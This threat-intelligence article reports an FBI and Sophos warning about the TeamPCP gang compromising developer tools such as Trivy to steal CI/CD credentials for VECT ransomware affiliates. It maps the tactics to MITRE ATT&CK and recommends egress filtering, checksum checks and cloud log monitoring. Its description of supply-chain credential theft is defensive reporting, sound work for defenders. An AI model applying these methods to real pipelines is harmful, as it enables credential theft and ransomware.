The Federal Bureau of Investigation (FBI) and researchers from Sophos have issued urgent warnings about a new, highly efficient cybercrime partnership between the VECT ransomware-as-a-service (RaaS) group and TeamPCP, a criminal gang known for large-scale software supply chain compromises. This alliance creates an "industrialized ransomware" model where TeamPCP steals developer credentials (cloud tokens, SSH keys, etc.) en masse by compromising popular developer tools, and then funnels these credentials to VECT affiliates for ransomware deployment. This streamlined process from credential theft to extortion significantly increases the speed, scale, and risk of ransomware attacks for any organization whose developers use the compromised tools. The FBI's FLASH alert highlights that TeamPCP has already targeted tools like Trivy, KICS, and LiteLLM, putting countless downstream organizations at immediate risk.
This collaboration represents a major shift in the ransomware ecosystem, moving towards a more specialized and efficient assembly-line process.
Sophos has already confirmed at least one VECT ransomware attack that used credentials stolen by TeamPCP, proving this industrialized model is operational.
TeamPCP's methodology for credential harvesting is sophisticated and difficult to detect. Their TTPs include:
T1195.001): They compromise open-source software repositories or packages for popular developer tools. The FBI alert specifically names Trivy, KICS, and LiteLLM as having been targeted.T1500): By modifying these tools, they inject malicious code that executes within the developer's CI/CD pipeline. This environment is often highly privileged, with access to numerous production secrets.T1552): The malicious code is designed to scan for and exfiltrate sensitive data, including cloud access tokens, SSH keys, and Kubernetes secrets.Once these credentials are stolen, they are passed to VECT affiliates. The VECT ransomware operators then use these credentials for:
T1078.004): They use the stolen cloud tokens to access the victim's cloud environment, exfiltrate data, and deploy ransomware on cloud-based systems.T1486): The final stage involves deploying the VECT ransomware to encrypt critical systems and demand a ransom.The industrialization of this attack chain has several critical implications:
No specific file hashes, IPs, or domains were listed in the provided articles.
Detecting this threat requires focusing on the CI/CD pipeline and cloud environment:
Dynamic Analysis.Service Binary Verification.Outbound Traffic Filtering.FBI alert confirms TeamPCP supply chain attacks impacted over 1,000 cloud environments, adding Telnyx Python SDK to compromised tools and providing new hunting hints.
Verifying the digital signatures of software dependencies and development tools can help detect tampering or compromise.
Strictly limit the permissions of CI/CD service accounts and use short-lived credentials to minimize the impact of a credential theft.
Implement strict egress filtering from build environments to prevent malicious code from exfiltrating stolen credentials.
Run build jobs in ephemeral, isolated containers with no access to the underlying host or other network resources beyond what is absolutely necessary.
To counter supply chain attacks targeting tools like Trivy, organizations must implement strict verification of all third-party software used in their CI/CD pipelines. Before ingestion, verify the checksums (SHA-256) of all binaries and packages against the official values published by the vendor. Where possible, enforce policies that only allow the use of digitally signed tools and libraries from trusted publishers. This process should be automated within the artifact repository or at the start of the build pipeline to ensure that no tampered or malicious versions of tools like Trivy or KICS are ever executed in the environment.
A critical defense against the credential exfiltration performed by compromised tools is to enforce a default-deny egress policy on all CI/CD build environments. Build agents should be firewalled to prevent all outbound network connections, except to a small, explicitly defined allowlist of required services (e.g., github.com, pypi.org, internal artifactories). This prevents the malicious code injected by TeamPCP from calling home to its C2 server to exfiltrate stolen SSH keys and cloud tokens. This simple but powerful control effectively breaks the attack chain at the point of data theft.
Given that TeamPCP provides stolen cloud credentials to VECT, continuous monitoring of cloud account activity is essential. Implement real-time monitoring of cloud audit logs (e.g., AWS CloudTrail) and configure alerts for high-risk activities associated with compromised keys. Key events to monitor include: a credential being used from a new or anomalous geographic location, a service account performing user-like enumeration activities (List*, Describe*, Get*), or any attempt to escalate privileges or create new users. This allows for rapid detection of a VECT affiliate attempting to use the stolen credentials, providing a chance to disable the key and respond before ransomware is deployed.
TeamPCP's attack on Aqua Security's Trivy vulnerability scanner results in the theft of over 500,000 credentials.
Sophos publishes a report detailing the partnership between VECT and TeamPCP.
The FBI issues a FLASH alert warning about TeamPCP's supply chain compromises.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats
Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.
Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.
Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.
Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.
Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.